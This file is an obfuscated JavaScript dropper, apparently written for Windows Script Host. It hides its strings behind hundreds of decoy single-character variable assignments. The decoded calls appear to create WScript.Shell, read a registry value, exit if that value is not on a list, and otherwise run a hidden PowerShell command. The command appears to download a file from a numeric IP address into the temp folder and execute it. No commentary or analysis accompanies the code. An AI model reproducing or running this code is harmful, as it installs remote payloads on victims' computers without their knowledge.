2 | var chmgli = this[pwnowbac + hutztd + axhdhf + vqvtz + dbffr + tbalj + xjyaks + fvlhuns] ( this[epdyrruhy + vrsexu + pgxbtj + axhdhf + qvazzc + pwnowbac + fvlhuns][dearp + axhdhf + dbffr + hutztd + fvlhuns + dbffr + wbnlt + rntemotzz + fzloe + dbffr + pgxbtj + fvlhuns] ( epdyrruhy + vrsexu + pgxbtj + axhdhf + qvazzc + pwnowbac + fvlhuns + ozmarcfqb + vrsexu + inzvqsy + dbffr + dvpsfww + dvpsfww ) [uutqda + dbffr + qoynj + uutqda + dbffr + hutztd + vqoeu] ( ezopb + xznsim + sncpdnb + bjspcsjbx + vlxzyu + dearp + ubuwls + uutqda + uutqda + sncpdnb + lrcxqw + mzjlwfldm + vlxzyu + ubuwls + vrsexu + sncpdnb + uutqda + cljzhziez + dearp + tuyufmmx + xjyaks + fvlhuns + axhdhf + tuyufmmx + dvpsfww + kzpqinse + qzogjvz + hutztd + xjyaks + dbffr + dvpsfww + cljzhziez + tbalj + xjyaks + fvlhuns + dbffr + axhdhf + xjyaks + hutztd + fvlhuns + qvazzc + tuyufmmx + xjyaks + hutztd + dvpsfww + cljzhziez + mhendmw + tuyufmmx + pgxbtj + hutztd + dvpsfww + dbffr ), 16 ); |
|
3 | for ( wasvzdks = 0 ; wasvzdks < qfunh[dvpsfww + dbffr + xjyaks + qoynj + fvlhuns + inzvqsy] ; ++ wasvzdks ) | |
4 | { | |
5 | if ( chmgli == qfunh[wasvzdks] ) | |
6 | { | |
7 | chmgli = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( chmgli !== true ) | |
12 | this[epdyrruhy + vrsexu + pgxbtj + axhdhf + qvazzc + pwnowbac + fvlhuns][vwoij + zcthyfm + qvazzc + fvlhuns] ( ); | |
13 | this[epdyrruhy + vrsexu + pgxbtj + axhdhf + qvazzc + pwnowbac + fvlhuns][dearp + axhdhf + dbffr + hutztd + fvlhuns + dbffr + wbnlt + rntemotzz + fzloe + dbffr + pgxbtj + fvlhuns] ( epdyrruhy + vrsexu + pgxbtj + axhdhf + qvazzc + pwnowbac + fvlhuns + ozmarcfqb + vrsexu + inzvqsy + dbffr + dvpsfww + dvpsfww ) [axhdhf + zcthyfm + xjyaks] ( pgxbtj + prxbmtd + vqoeu + kzpqinse + wvkljypf + pgxbtj + kzpqinse + pwnowbac + tuyufmmx + rkllmfjku + dbffr + axhdhf + vqvtz + inzvqsy + dbffr + dvpsfww + dvpsfww + ozmarcfqb + dbffr + wwykzla + dbffr + kzpqinse + ygnqnp + dearp + tuyufmmx + prxbmtd + prxbmtd + hutztd + xjyaks + vqoeu + kzpqinse + ncxaetoy + tbalj + xjyaks + csweau + tuyufmmx + ijxhzyohe + dbffr + ygnqnp + epdyrruhy + dbffr + rntemotzz + uutqda + dbffr + fciwskfo + zcthyfm + dbffr + vqvtz + fvlhuns + kzpqinse + ygnqnp + wbnlt + zcthyfm + fvlhuns + fsxyfgg + qvazzc + dvpsfww + dbffr + kzpqinse + dgium + fvlhuns + dbffr + prxbmtd + pwnowbac + dgium + cljzhziez + qvazzc + xjyaks + csweau + tuyufmmx + qvazzc + pgxbtj + dbffr + ozmarcfqb + pwnowbac + vqoeu + wwwlebqs + kzpqinse + inzvqsy + fvlhuns + fvlhuns + pwnowbac + yztbfvo + wvkljypf + wvkljypf + aexbeg + uvylcbi + xjnnstx + ozmarcfqb + aexbeg + lsejh + xjnnstx + ozmarcfqb + aexbeg + ozmarcfqb + xfzcxqyu + rtbygvifv + ngybeceel + wvkljypf + qvazzc + xjyaks + csweau + tuyufmmx + qvazzc + pgxbtj + dbffr + ozmarcfqb + pwnowbac + inzvqsy + pwnowbac + ncxaetoy + ifcjymge + ifcjymge + vqvtz + fvlhuns + hutztd + axhdhf + fvlhuns + kzpqinse + dgium + fvlhuns + dbffr + prxbmtd + pwnowbac + dgium + cljzhziez + qvazzc + xjyaks + csweau + tuyufmmx + qvazzc + pgxbtj + dbffr + ozmarcfqb + pwnowbac + vqoeu + wwwlebqs + ifcjymge + ifcjymge + pgxbtj + prxbmtd + vqoeu + kzpqinse + wvkljypf + pgxbtj + kzpqinse + xjyaks + dbffr + fvlhuns + kzpqinse + zcthyfm + vqvtz + dbffr + kzpqinse + cljzhziez + cljzhziez + aexbeg + uvylcbi + xjnnstx + ozmarcfqb + aexbeg + lsejh + xjnnstx + ozmarcfqb + aexbeg + ozmarcfqb + xfzcxqyu + rtbygvifv + ngybeceel + xzglvvh + lvote + lvote + lvote + lvote + cljzhziez + vqoeu + hutztd + csweau + rkllmfjku + rkllmfjku + rkllmfjku + axhdhf + tuyufmmx + tuyufmmx + fvlhuns + cljzhziez + ifcjymge + ifcjymge + pgxbtj + prxbmtd + vqoeu + kzpqinse + wvkljypf + pgxbtj + kzpqinse + axhdhf + dbffr + qoynj + vqvtz + csweau + axhdhf + xjnnstx + xfzcxqyu + kzpqinse + wvkljypf + vqvtz + kzpqinse + cljzhziez + cljzhziez + aexbeg + uvylcbi + xjnnstx + ozmarcfqb + aexbeg + lsejh + xjnnstx + ozmarcfqb + aexbeg + ozmarcfqb + xfzcxqyu + rtbygvifv + ngybeceel + xzglvvh + lvote + lvote + lvote + lvote + cljzhziez + vqoeu + hutztd + csweau + rkllmfjku + rkllmfjku + rkllmfjku + axhdhf + tuyufmmx + tuyufmmx + fvlhuns + cljzhziez + xjnnstx + xfzcxqyu + rtbygvifv + aexbeg + ngybeceel + xfzcxqyu + uvylcbi + uvylcbi + pdncozgao + xfzcxqyu + xfzcxqyu + ngybeceel + xfzcxqyu + ngybeceel + xfzcxqyu + ozmarcfqb + vqoeu + dvpsfww + dvpsfww, 0, false ); |
|
14 | } | |
15 | xjnnstx = "y"; | |
16 | xjnnstx = "x"; | |
17 | xjnnstx = "L"; | |
18 | xjnnstx = "e"; | |
19 | xjnnstx = "A"; | |
20 | xjnnstx = "J"; | |
21 | xjnnstx = "g"; | |
22 | xjnnstx = "M"; | |
23 | xjnnstx = "Z"; | |
24 | xjnnstx = "a"; | |
25 | xjnnstx = "D"; | |
26 | xjnnstx = "z"; | |
27 | xjnnstx = "J"; | |
28 | xjnnstx = "v"; | |
29 | xjnnstx = "p"; | |
30 | xjnnstx = "I"; | |
31 | xjnnstx = "U"; | |
32 | xjnnstx = "f"; | |
33 | xjnnstx = "J"; | |
34 | xjnnstx = "d"; | |
35 | xjnnstx = "a"; | |
36 | xjnnstx = "g"; | |
37 | xjnnstx = "O"; | |
38 | xjnnstx = "r"; | |
39 | xjnnstx = "J"; | |
40 | xjnnstx = "U"; | |
41 | xjnnstx = "b"; | |
42 | xjnnstx = "u"; | |
43 | xjnnstx = "W"; | |
44 | xjnnstx = "a"; | |
45 | xjnnstx = "y"; | |
46 | xjnnstx = "Z"; | |
47 | xjnnstx = "b"; | |
48 | xjnnstx = "a"; | |
49 | xjnnstx = "Z"; | |
50 | xjnnstx = "w"; | |
51 | xjnnstx = "P"; | |
52 | xjnnstx = "o"; | |
53 | xjnnstx = "3"; | |
54 | lsejh = "R"; | |
55 | lsejh = "g"; | |
56 | lsejh = "p"; | |
57 | lsejh = "e"; | |
58 | lsejh = "G"; | |
59 | lsejh = "j"; | |
60 | lsejh = "N"; | |
61 | lsejh = "k"; | |
62 | lsejh = "P"; | |
63 | lsejh = "P"; | |
64 | lsejh = "y"; | |
65 | lsejh = "Q"; | |
66 | lsejh = "f"; | |
67 | lsejh = "U"; | |
68 | lsejh = "L"; | |
69 | lsejh = "I"; | |
70 | lsejh = "b"; | |
71 | lsejh = "O"; | |
72 | lsejh = "T"; | |
73 | lsejh = "Q"; | |
74 | lsejh = "u"; | |
75 | lsejh = "R"; | |
76 | lsejh = "c"; | |
77 | lsejh = "K"; | |
78 | lsejh = "t"; | |
79 | lsejh = "j"; | |
80 | lsejh = "x"; | |
81 | lsejh = "t"; | |
82 | lsejh = "q"; | |
83 | lsejh = "C"; | |
84 | lsejh = "X"; | |
85 | lsejh = "z"; | |
86 | lsejh = "y"; | |
87 | lsejh = "4"; | |
88 | wvkljypf = "S"; | |
89 | wvkljypf = "z"; | |
90 | wvkljypf = "S"; | |
91 | wvkljypf = "g"; | |
92 | wvkljypf = "L"; | |
93 | wvkljypf = "I"; | |
94 | wvkljypf = "I"; | |
95 | wvkljypf = "r"; | |
96 | wvkljypf = "g"; | |
97 | wvkljypf = "x"; | |
98 | wvkljypf = "/"; | |
99 | dgium = "k"; | |
100 | dgium = "e"; | |
101 | dgium = "C"; | |
102 | dgium = "S"; | |
103 | dgium = "J"; | |
104 | dgium = "O"; | |
105 | dgium = "E"; | |
106 | dgium = "V"; | |
107 | dgium = "K"; | |
108 | dgium = "l"; | |
109 | dgium = "r"; | |
110 | dgium = "p"; | |
111 | dgium = "R"; | |
112 | dgium = "p"; | |
113 | dgium = "L"; | |
114 | dgium = "L"; | |
115 | dgium = "r"; | |
116 | dgium = "n"; | |
117 | dgium = "m"; | |
118 | dgium = "y"; | |
119 | dgium = "B"; | |
120 | dgium = "%"; | |
121 | dvpsfww = "I"; | |
122 | dvpsfww = "N"; | |
123 | dvpsfww = "H"; | |
124 | dvpsfww = "R"; | |
125 | dvpsfww = "j"; | |
126 | dvpsfww = "K"; | |
127 | dvpsfww = "b"; | |
128 | dvpsfww = "c"; | |
129 | dvpsfww = "j"; | |
130 | dvpsfww = "H"; | |
131 | dvpsfww = "e"; | |
132 | dvpsfww = "U"; | |
133 | dvpsfww = "D"; | |
134 | dvpsfww = "a"; | |
135 | dvpsfww = "k"; | |
136 | dvpsfww = "P"; | |
137 | dvpsfww = "Z"; | |
138 | dvpsfww = "z"; | |
139 | dvpsfww = "k"; | |
140 | dvpsfww = "P"; | |
141 | dvpsfww = "C"; | |
142 | dvpsfww = "d"; | |
143 | dvpsfww = "P"; | |
144 | dvpsfww = "I"; | |
145 | dvpsfww = "h"; | |
146 | dvpsfww = "B"; | |
147 | dvpsfww = "m"; | |
148 | dvpsfww = "N"; | |
149 | dvpsfww = "Y"; | |
150 | dvpsfww = "N"; | |
151 | dvpsfww = "l"; | |
152 | dvpsfww = "l"; | |
153 | kzpqinse = "o"; | |
154 | kzpqinse = "M"; | |
155 | kzpqinse = "z"; | |
156 | kzpqinse = "T"; | |
157 | kzpqinse = "h"; | |
158 | kzpqinse = "b"; | |
159 | kzpqinse = "O"; | |
160 | kzpqinse = "g"; | |
161 | kzpqinse = "x"; | |
162 | kzpqinse = "K"; | |
163 | kzpqinse = "u"; | |
164 | kzpqinse = "C"; | |
165 | kzpqinse = "m"; | |
166 | kzpqinse = "R"; | |
167 | kzpqinse = "C"; | |
168 | kzpqinse = "n"; | |
169 | kzpqinse = "s"; | |
170 | kzpqinse = "q"; | |
171 | kzpqinse = "B"; | |
172 | kzpqinse = "H"; | |
173 | kzpqinse = "H"; | |
174 | kzpqinse = " "; | |
175 | wbnlt = "c"; | |
176 | wbnlt = "r"; | |
177 | wbnlt = "F"; | |
178 | wbnlt = "V"; | |
179 | wbnlt = "Y"; | |
180 | wbnlt = "c"; | |
181 | wbnlt = "s"; | |
182 | wbnlt = "V"; | |
183 | wbnlt = "D"; | |
184 | wbnlt = "i"; | |
185 | wbnlt = "g"; | |
186 | wbnlt = "T"; | |
187 | wbnlt = "c"; | |
188 | wbnlt = "K"; | |
189 | wbnlt = "a"; | |
190 | wbnlt = "B"; | |
191 | wbnlt = "y"; | |
192 | wbnlt = "Z"; | |
193 | wbnlt = "K"; | |
194 | wbnlt = "y"; | |
195 | wbnlt = "u"; | |
196 | wbnlt = "t"; | |
197 | wbnlt = "w"; | |
198 | wbnlt = "R"; | |
199 | wbnlt = "e"; | |
200 | wbnlt = "Z"; | |
201 | wbnlt = "X"; | |
202 | wbnlt = "j"; | |
203 | wbnlt = "e"; | |
204 | wbnlt = "p"; | |
205 | wbnlt = "E"; | |
206 | wbnlt = "i"; | |
207 | wbnlt = "G"; | |
208 | wbnlt = "A"; | |
209 | wbnlt = "x"; | |
210 | wbnlt = "k"; | |
211 | wbnlt = "D"; | |
212 | wbnlt = "C"; | |
213 | wbnlt = "O"; | |
214 | uutqda = "m"; | |
215 | uutqda = "J"; | |
216 | uutqda = "d"; | |
217 | uutqda = "D"; | |
218 | uutqda = "w"; | |
219 | uutqda = "x"; | |
220 | uutqda = "V"; | |
221 | uutqda = "L"; | |
222 | uutqda = "n"; | |
223 | uutqda = "t"; | |
224 | uutqda = "o"; | |
225 | uutqda = "v"; | |
226 | uutqda = "l"; | |
227 | uutqda = "S"; | |
228 | uutqda = "f"; | |
229 | uutqda = "f"; | |
230 | uutqda = "C"; | |
231 | uutqda = "l"; | |
232 | uutqda = "B"; | |
233 | uutqda = "c"; | |
234 | uutqda = "b"; | |
235 | uutqda = "D"; | |
236 | uutqda = "Y"; | |
237 | uutqda = "h"; | |
238 | uutqda = "R"; | |
239 | aexbeg = "q"; | |
240 | aexbeg = "F"; | |
241 | aexbeg = "V"; | |
242 | aexbeg = "C"; | |
243 | aexbeg = "c"; | |
244 | aexbeg = "H"; | |
245 | aexbeg = "h"; | |
246 | aexbeg = "S"; | |
247 | aexbeg = "W"; | |
248 | aexbeg = "H"; | |
249 | aexbeg = "d"; | |
250 | aexbeg = "i"; | |
251 | aexbeg = "W"; | |
252 | aexbeg = "Q"; | |
253 | aexbeg = "b"; | |
254 | aexbeg = "V"; | |
255 | aexbeg = "q"; | |
256 | aexbeg = "z"; | |
257 | aexbeg = "i"; | |
258 | aexbeg = "C"; | |
259 | aexbeg = "1"; | |
260 | ncxaetoy = "p"; | |
261 | ncxaetoy = "Y"; | |
262 | ncxaetoy = "o"; | |
263 | ncxaetoy = "I"; | |
264 | ncxaetoy = "N"; | |
265 | ncxaetoy = "W"; | |
266 | ncxaetoy = "S"; | |
267 | ncxaetoy = "W"; | |
268 | ncxaetoy = "s"; | |
269 | ncxaetoy = "n"; | |
270 | ncxaetoy = "W"; | |
271 | ncxaetoy = "j"; | |
272 | ncxaetoy = "D"; | |
273 | ncxaetoy = "v"; | |
274 | ncxaetoy = "C"; | |
275 | ncxaetoy = "V"; | |
276 | ncxaetoy = "E"; | |
277 | ncxaetoy = "d"; | |
278 | ncxaetoy = "K"; | |
279 | ncxaetoy = "T"; | |
280 | ncxaetoy = "x"; | |
281 | ncxaetoy = "i"; | |
282 | ncxaetoy = "q"; | |
283 | ncxaetoy = "o"; | |
284 | ncxaetoy = "f"; | |
285 | ncxaetoy = "Q"; | |
286 | ncxaetoy = "z"; | |
287 | ncxaetoy = "T"; | |
288 | ncxaetoy = "V"; | |
289 | ncxaetoy = "j"; | |
290 | ncxaetoy = "Q"; | |
291 | ncxaetoy = "l"; | |
292 | ncxaetoy = "e"; | |
293 | ncxaetoy = "a"; | |
294 | ncxaetoy = "P"; | |
295 | ncxaetoy = "r"; | |
296 | ncxaetoy = "t"; | |
297 | ncxaetoy = "l"; | |
298 | ncxaetoy = "z"; | |
299 | ncxaetoy = "w"; | |
300 | ncxaetoy = "m"; | |
301 | ncxaetoy = "L"; | |
302 | ncxaetoy = "o"; | |
303 | ncxaetoy = "f"; | |
304 | ncxaetoy = "\""; | |
305 | vqvtz = "u"; | |
306 | vqvtz = "N"; | |
307 | vqvtz = "U"; | |
308 | vqvtz = "p"; | |
309 | vqvtz = "L"; | |
310 | vqvtz = "a"; | |
311 | vqvtz = "r"; | |
312 | vqvtz = "D"; | |
313 | vqvtz = "k"; | |
314 | vqvtz = "E"; | |
315 | vqvtz = "i"; | |
316 | vqvtz = "A"; | |
317 | vqvtz = "K"; | |
318 | vqvtz = "p"; | |
319 | vqvtz = "a"; | |
320 | vqvtz = "X"; | |
321 | vqvtz = "Q"; | |
322 | vqvtz = "e"; | |
323 | vqvtz = "X"; | |
324 | vqvtz = "I"; | |
325 | vqvtz = "D"; | |
326 | vqvtz = "N"; | |
327 | vqvtz = "D"; | |
328 | vqvtz = "t"; | |
329 | vqvtz = "V"; | |
330 | vqvtz = "B"; | |
331 | vqvtz = "w"; | |
332 | vqvtz = "s"; | |
333 | bjspcsjbx = "E"; | |
334 | bjspcsjbx = "G"; | |
335 | bjspcsjbx = "j"; | |
336 | bjspcsjbx = "H"; | |
337 | bjspcsjbx = "V"; | |
338 | bjspcsjbx = "f"; | |
339 | bjspcsjbx = "s"; | |
340 | bjspcsjbx = "b"; | |
341 | bjspcsjbx = "i"; | |
342 | bjspcsjbx = "S"; | |
343 | bjspcsjbx = "f"; | |
344 | bjspcsjbx = "H"; | |
345 | bjspcsjbx = "I"; | |
346 | bjspcsjbx = "Y"; | |
347 | uvylcbi = "M"; | |
348 | uvylcbi = "N"; | |
349 | uvylcbi = "e"; | |
350 | uvylcbi = "A"; | |
351 | uvylcbi = "E"; | |
352 | uvylcbi = "Z"; | |
353 | uvylcbi = "b"; | |
354 | uvylcbi = "e"; | |
355 | uvylcbi = "z"; | |
356 | uvylcbi = "o"; | |
357 | uvylcbi = "w"; | |
358 | uvylcbi = "J"; | |
359 | uvylcbi = "J"; | |
360 | uvylcbi = "u"; | |
361 | uvylcbi = "E"; | |
362 | uvylcbi = "n"; | |
363 | uvylcbi = "O"; | |
364 | uvylcbi = "g"; | |
365 | uvylcbi = "O"; | |
366 | uvylcbi = "X"; | |
367 | uvylcbi = "H"; | |
368 | uvylcbi = "z"; | |
369 | uvylcbi = "N"; | |
370 | uvylcbi = "V"; | |
371 | uvylcbi = "c"; | |
372 | uvylcbi = "C"; | |
373 | uvylcbi = "9"; | |
374 | wwwlebqs = "D"; | |
375 | wwwlebqs = "A"; | |
376 | wwwlebqs = "a"; | |
377 | wwwlebqs = "V"; | |
378 | wwwlebqs = "t"; | |
379 | wwwlebqs = "O"; | |
380 | wwwlebqs = "J"; | |
381 | wwwlebqs = "s"; | |
382 | wwwlebqs = "y"; | |
383 | wwwlebqs = "f"; | |
384 | mzjlwfldm = "y"; | |
385 | mzjlwfldm = "r"; | |
386 | mzjlwfldm = "J"; | |
387 | mzjlwfldm = "Y"; | |
388 | mzjlwfldm = "t"; | |
389 | mzjlwfldm = "B"; | |
390 | mzjlwfldm = "o"; | |
391 | mzjlwfldm = "M"; | |
392 | mzjlwfldm = "j"; | |
393 | mzjlwfldm = "r"; | |
394 | mzjlwfldm = "o"; | |
395 | mzjlwfldm = "u"; | |
396 | mzjlwfldm = "k"; | |
397 | mzjlwfldm = "P"; | |
398 | mzjlwfldm = "J"; | |
399 | mzjlwfldm = "o"; | |
400 | mzjlwfldm = "M"; | |
401 | mzjlwfldm = "e"; | |
402 | mzjlwfldm = "Q"; | |
403 | mzjlwfldm = "M"; | |
404 | mzjlwfldm = "W"; | |
405 | mzjlwfldm = "K"; | |
406 | mzjlwfldm = "g"; | |
407 | mzjlwfldm = "r"; | |
408 | mzjlwfldm = "j"; | |
409 | mzjlwfldm = "r"; | |
410 | mzjlwfldm = "X"; | |
411 | mzjlwfldm = "U"; | |
412 | mzjlwfldm = "T"; | |
413 | mzjlwfldm = "T"; | |
414 | ifcjymge = "X"; | |
415 | ifcjymge = "u"; | |
416 | ifcjymge = "W"; | |
417 | ifcjymge = "b"; | |
418 | ifcjymge = "M"; | |
419 | ifcjymge = "&"; | |
420 | xzglvvh = "k"; | |
421 | xzglvvh = "c"; | |
422 | xzglvvh = "s"; | |
423 | xzglvvh = "p"; | |
424 | xzglvvh = "D"; | |
425 | xzglvvh = "Y"; | |
426 | xzglvvh = "b"; | |
427 | xzglvvh = "q"; | |
428 | xzglvvh = "H"; | |
429 | xzglvvh = "b"; | |
430 | xzglvvh = "Z"; | |
431 | xzglvvh = "a"; | |
432 | xzglvvh = "B"; | |
433 | xzglvvh = "P"; | |
434 | xzglvvh = "J"; | |
435 | xzglvvh = "B"; | |
436 | xzglvvh = "U"; | |
437 | xzglvvh = "d"; | |
438 | xzglvvh = "u"; | |
439 | xzglvvh = "u"; | |
440 | xzglvvh = "H"; | |
441 | xzglvvh = "O"; | |
442 | xzglvvh = "b"; | |
443 | xzglvvh = "Y"; | |
444 | xzglvvh = "c"; | |
445 | xzglvvh = "y"; | |
446 | xzglvvh = "w"; | |
447 | xzglvvh = "W"; | |
448 | xzglvvh = "v"; | |
449 | xzglvvh = "j"; | |
450 | xzglvvh = "c"; | |
451 | xzglvvh = "y"; | |
452 | xzglvvh = "d"; | |
453 | xzglvvh = "r"; | |
454 | xzglvvh = "x"; | |
455 | xzglvvh = "u"; | |
456 | xzglvvh = "J"; | |
457 | xzglvvh = "S"; | |
458 | xzglvvh = "Z"; | |
459 | xzglvvh = "@"; | |
460 | fvlhuns = "p"; | |
461 | fvlhuns = "H"; | |
462 | fvlhuns = "g"; | |
463 | fvlhuns = "e"; | |
464 | fvlhuns = "W"; | |
465 | fvlhuns = "U"; | |
466 | fvlhuns = "l"; | |
467 | fvlhuns = "T"; | |
468 | fvlhuns = "L"; | |
469 | fvlhuns = "L"; | |
470 | fvlhuns = "G"; | |
471 | fvlhuns = "O"; | |
472 | fvlhuns = "Q"; | |
473 | fvlhuns = "V"; | |
474 | fvlhuns = "a"; | |
475 | fvlhuns = "y"; | |
476 | fvlhuns = "i"; | |
477 | fvlhuns = "J"; | |
478 | fvlhuns = "n"; | |
479 | fvlhuns = "R"; | |
480 | fvlhuns = "E"; | |
481 | fvlhuns = "n"; | |
482 | fvlhuns = "M"; | |
483 | fvlhuns = "a"; | |
484 | fvlhuns = "X"; | |
485 | fvlhuns = "f"; | |
486 | fvlhuns = "U"; | |
487 | fvlhuns = "g"; | |
488 | fvlhuns = "u"; | |
489 | fvlhuns = "Y"; | |
490 | fvlhuns = "M"; | |
491 | fvlhuns = "A"; | |
492 | fvlhuns = "c"; | |
493 | fvlhuns = "f"; | |
494 | fvlhuns = "x"; | |
495 | fvlhuns = "h"; | |
496 | fvlhuns = "k"; | |
497 | fvlhuns = "v"; | |
498 | fvlhuns = "t"; | |
499 | qzogjvz = "f"; | |
500 | qzogjvz = "W"; | |
501 | qzogjvz = "v"; | |
502 | qzogjvz = "A"; | |
503 | qzogjvz = "z"; | |
504 | qzogjvz = "i"; | |
505 | qzogjvz = "y"; | |
506 | qzogjvz = "c"; | |
507 | qzogjvz = "T"; | |
508 | qzogjvz = "q"; | |
509 | qzogjvz = "R"; | |
510 | qzogjvz = "X"; | |
511 | qzogjvz = "m"; | |
512 | qzogjvz = "n"; | |
513 | qzogjvz = "p"; | |
514 | qzogjvz = "b"; | |
515 | qzogjvz = "P"; | |
516 | lrcxqw = "E"; | |
517 | lrcxqw = "p"; | |
518 | lrcxqw = "m"; | |
519 | lrcxqw = "j"; | |
520 | lrcxqw = "u"; | |
521 | lrcxqw = "J"; | |
522 | lrcxqw = "c"; | |
523 | lrcxqw = "O"; | |
524 | lrcxqw = "p"; | |
525 | lrcxqw = "N"; | |
526 | lvote = "L"; | |
527 | lvote = "C"; | |
528 | lvote = "Q"; | |
529 | lvote = "R"; | |
530 | lvote = "W"; | |
531 | lvote = "Q"; | |
532 | lvote = "Y"; | |
533 | lvote = "M"; | |
534 | lvote = "f"; | |
535 | lvote = "b"; | |
536 | lvote = "x"; | |
537 | lvote = "Z"; | |
538 | lvote = "U"; | |
539 | lvote = "x"; | |
540 | lvote = "M"; | |
541 | lvote = "8"; | |
542 | vqoeu = "e"; | |
543 | vqoeu = "I"; | |
544 | vqoeu = "y"; | |
545 | vqoeu = "A"; | |
546 | vqoeu = "h"; | |
547 | vqoeu = "D"; | |
548 | vqoeu = "N"; | |
549 | vqoeu = "z"; | |
550 | vqoeu = "V"; | |
551 | vqoeu = "E"; | |
552 | vqoeu = "E"; | |
553 | vqoeu = "v"; | |
554 | vqoeu = "x"; | |
555 | vqoeu = "s"; | |
556 | vqoeu = "Q"; | |
557 | vqoeu = "E"; | |
558 | vqoeu = "a"; | |
559 | vqoeu = "z"; | |
560 | vqoeu = "g"; | |
561 | vqoeu = "c"; | |
562 | vqoeu = "m"; | |
563 | vqoeu = "c"; | |
564 | vqoeu = "z"; | |
565 | vqoeu = "Y"; | |
566 | vqoeu = "K"; | |
567 | vqoeu = "f"; | |
568 | vqoeu = "N"; | |
569 | vqoeu = "n"; | |
570 | vqoeu = "F"; | |
571 | vqoeu = "I"; | |
572 | vqoeu = "i"; | |
573 | vqoeu = "I"; | |
574 | vqoeu = "G"; | |
575 | vqoeu = "F"; | |
576 | vqoeu = "a"; | |
577 | vqoeu = "s"; | |
578 | vqoeu = "F"; | |
579 | vqoeu = "d"; | |
580 | ezopb = "i"; | |
581 | ezopb = "t"; | |
582 | ezopb = "D"; | |
583 | ezopb = "I"; | |
584 | ezopb = "b"; | |
585 | ezopb = "u"; | |
586 | ezopb = "T"; | |
587 | ezopb = "Y"; | |
588 | ezopb = "E"; | |
589 | ezopb = "S"; | |
590 | ezopb = "n"; | |
591 | ezopb = "D"; | |
592 | ezopb = "r"; | |
593 | ezopb = "H"; | |
594 | epdyrruhy = "x"; | |
595 | epdyrruhy = "D"; | |
596 | epdyrruhy = "t"; | |
597 | epdyrruhy = "c"; | |
598 | epdyrruhy = "x"; | |
599 | epdyrruhy = "n"; | |
600 | epdyrruhy = "B"; | |
601 | epdyrruhy = "F"; | |
602 | epdyrruhy = "H"; | |
603 | epdyrruhy = "L"; | |
604 | epdyrruhy = "g"; | |
605 | epdyrruhy = "v"; | |
606 | epdyrruhy = "b"; | |
607 | epdyrruhy = "b"; | |
608 | epdyrruhy = "I"; | |
609 | epdyrruhy = "n"; | |
610 | epdyrruhy = "v"; | |
611 | epdyrruhy = "j"; | |
612 | epdyrruhy = "O"; | |
613 | epdyrruhy = "W"; | |
614 | epdyrruhy = "A"; | |
615 | epdyrruhy = "l"; | |
616 | epdyrruhy = "P"; | |
617 | epdyrruhy = "c"; | |
618 | epdyrruhy = "k"; | |
619 | epdyrruhy = "W"; | |
620 | xjyaks = "L"; | |
621 | xjyaks = "L"; | |
622 | xjyaks = "h"; | |
623 | xjyaks = "n"; | |
624 | pdncozgao = "V"; | |
625 | pdncozgao = "f"; | |
626 | pdncozgao = "h"; | |
627 | pdncozgao = "A"; | |
628 | pdncozgao = "l"; | |
629 | pdncozgao = "n"; | |
630 | pdncozgao = "D"; | |
631 | pdncozgao = "T"; | |
632 | pdncozgao = "r"; | |
633 | pdncozgao = "D"; | |
634 | pdncozgao = "V"; | |
635 | pdncozgao = "a"; | |
636 | pdncozgao = "P"; | |
637 | pdncozgao = "e"; | |
638 | pdncozgao = "B"; | |
639 | pdncozgao = "A"; | |
640 | pdncozgao = "h"; | |
641 | pdncozgao = "c"; | |
642 | pdncozgao = "q"; | |
643 | pdncozgao = "k"; | |
644 | pdncozgao = "F"; | |
645 | pdncozgao = "l"; | |
646 | pdncozgao = "D"; | |
647 | pdncozgao = "B"; | |
648 | pdncozgao = "y"; | |
649 | pdncozgao = "S"; | |
650 | pdncozgao = "T"; | |
651 | pdncozgao = "H"; | |
652 | pdncozgao = "R"; | |
653 | pdncozgao = "S"; | |
654 | pdncozgao = "p"; | |
655 | pdncozgao = "a"; | |
656 | pdncozgao = "K"; | |
657 | pdncozgao = "q"; | |
658 | pdncozgao = "V"; | |
659 | pdncozgao = "l"; | |
660 | pdncozgao = "R"; | |
661 | pdncozgao = "r"; | |
662 | pdncozgao = "w"; | |
663 | pdncozgao = "I"; | |
664 | pdncozgao = "l"; | |
665 | pdncozgao = "o"; | |
666 | pdncozgao = "r"; | |
667 | pdncozgao = "6"; | |
668 | fciwskfo = "S"; | |
669 | fciwskfo = "y"; | |
670 | fciwskfo = "G"; | |
671 | fciwskfo = "T"; | |
672 | fciwskfo = "N"; | |
673 | fciwskfo = "A"; | |
674 | fciwskfo = "r"; | |
675 | fciwskfo = "D"; | |
676 | fciwskfo = "K"; | |
677 | fciwskfo = "L"; | |
678 | fciwskfo = "r"; | |
679 | fciwskfo = "G"; | |
680 | fciwskfo = "I"; | |
681 | fciwskfo = "b"; | |
682 | fciwskfo = "r"; | |
683 | fciwskfo = "I"; | |
684 | fciwskfo = "C"; | |
685 | fciwskfo = "H"; | |
686 | fciwskfo = "u"; | |
687 | fciwskfo = "p"; | |
688 | fciwskfo = "r"; | |
689 | fciwskfo = "f"; | |
690 | fciwskfo = "F"; | |
691 | fciwskfo = "B"; | |
692 | fciwskfo = "f"; | |
693 | fciwskfo = "f"; | |
694 | fciwskfo = "l"; | |
695 | fciwskfo = "C"; | |
696 | fciwskfo = "L"; | |
697 | fciwskfo = "A"; | |
698 | fciwskfo = "W"; | |
699 | fciwskfo = "R"; | |
700 | fciwskfo = "w"; | |
701 | fciwskfo = "l"; | |
702 | fciwskfo = "n"; | |
703 | fciwskfo = "N"; | |
704 | fciwskfo = "M"; | |
705 | fciwskfo = "s"; | |
706 | fciwskfo = "O"; | |
707 | fciwskfo = "q"; | |
708 | xznsim = "s"; | |
709 | xznsim = "x"; | |
710 | xznsim = "w"; | |
711 | xznsim = "h"; | |
712 | xznsim = "R"; | |
713 | xznsim = "K"; | |
714 | xznsim = "B"; | |
715 | xznsim = "Z"; | |
716 | xznsim = "B"; | |
717 | xznsim = "J"; | |
718 | xznsim = "b"; | |
719 | xznsim = "S"; | |
720 | xznsim = "v"; | |
721 | xznsim = "o"; | |
722 | xznsim = "b"; | |
723 | xznsim = "y"; | |
724 | xznsim = "m"; | |
725 | xznsim = "g"; | |
726 | xznsim = "R"; | |
727 | xznsim = "y"; | |
728 | xznsim = "K"; | |
729 | zcthyfm = "p"; | |
730 | zcthyfm = "n"; | |
731 | zcthyfm = "N"; | |
732 | zcthyfm = "A"; | |
733 | zcthyfm = "u"; | |
734 | tuyufmmx = "H"; | |
735 | tuyufmmx = "O"; | |
736 | tuyufmmx = "j"; | |
737 | tuyufmmx = "p"; | |
738 | tuyufmmx = "n"; | |
739 | tuyufmmx = "I"; | |
